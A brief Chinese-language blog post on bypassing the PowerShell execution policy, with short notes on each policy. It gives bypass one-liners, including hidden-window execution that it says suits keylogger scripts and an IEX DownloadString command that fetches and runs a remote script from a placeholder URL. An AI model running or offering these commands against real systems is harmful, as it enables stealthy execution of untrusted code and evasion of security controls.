PowerShell执行策略的简单绕过


执行策略

Get-ExecutionPolicy   #查看当前策略

# 四种
- Restricted        #脚本不能运行(默认)
- RemoteSigned      #本地创建的脚本可以运行,但从网上下载的脚本不能运行
- AllSigned         #仅当脚本由信任的发布者签名时才能运行
- Unrestricted      #允许所有的脚本运行

# 设置PowerShell执行策略
Set-ExecutionPolicy <策略名>

绕过

1.

# 先设置当前用户的执行策略为Unrestricted,也算是去更改了当前的全局策略
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted 
# 再执行脚本

2.

# 或是下面这种,-Windowstyle hidden 可以让我们的执行无任何弹窗, -NoProfile不加载当前用户配置
powershell.exe -executionpolicy bypass -Windowstyle hidden -Noninteractive -nologo -NoProfile -File xxx.sp1

# Noexit  执行结束不退出shell(对键盘记录等脚本非常有用)

3.

# 绕过本地权限执行
PowerShell.exe -ExecutionPolicy Bypass -File xxx.sp11

4.

# 用IEX下载远程PS1脚本绕过
PowerShell.exe -ExecutionPolicy Bypass  -Windowstyle hidden -Noninteractive -NoProfile IEX(New-ObjectNet.WebClient).DownloadString("http://xxxxx.xxx.ps1");[Parameters]

5.更多执行策略绕过:

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy

文章作者: 剑胆琴心
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 剑胆琴心 !
评论
 上一篇
ubuntu server-版本控制 ubuntu server-版本控制
107-版本控制概述简介version control system(版本控制系统)revision control system (修订控制系统) 开发工具,但不仅限于源码文件 记录文件的每次变更 随时可以回到历史状态 文件以及元数据的
2020-05-10
下一篇 
Metasploit初学-散记 Metasploit初学-散记
MSF 最牛X的地方是:支持整个渗透测试过程 理论方面 技术架构1.辅助模块(auxiliary)包含了扫描、嗅探、指纹识别、网络欺骗等相关功能模块 2.渗透攻击模块(exploits)利用程序,针对漏洞、权限进行利用,是主要使用的模块
2020-05-09
  目录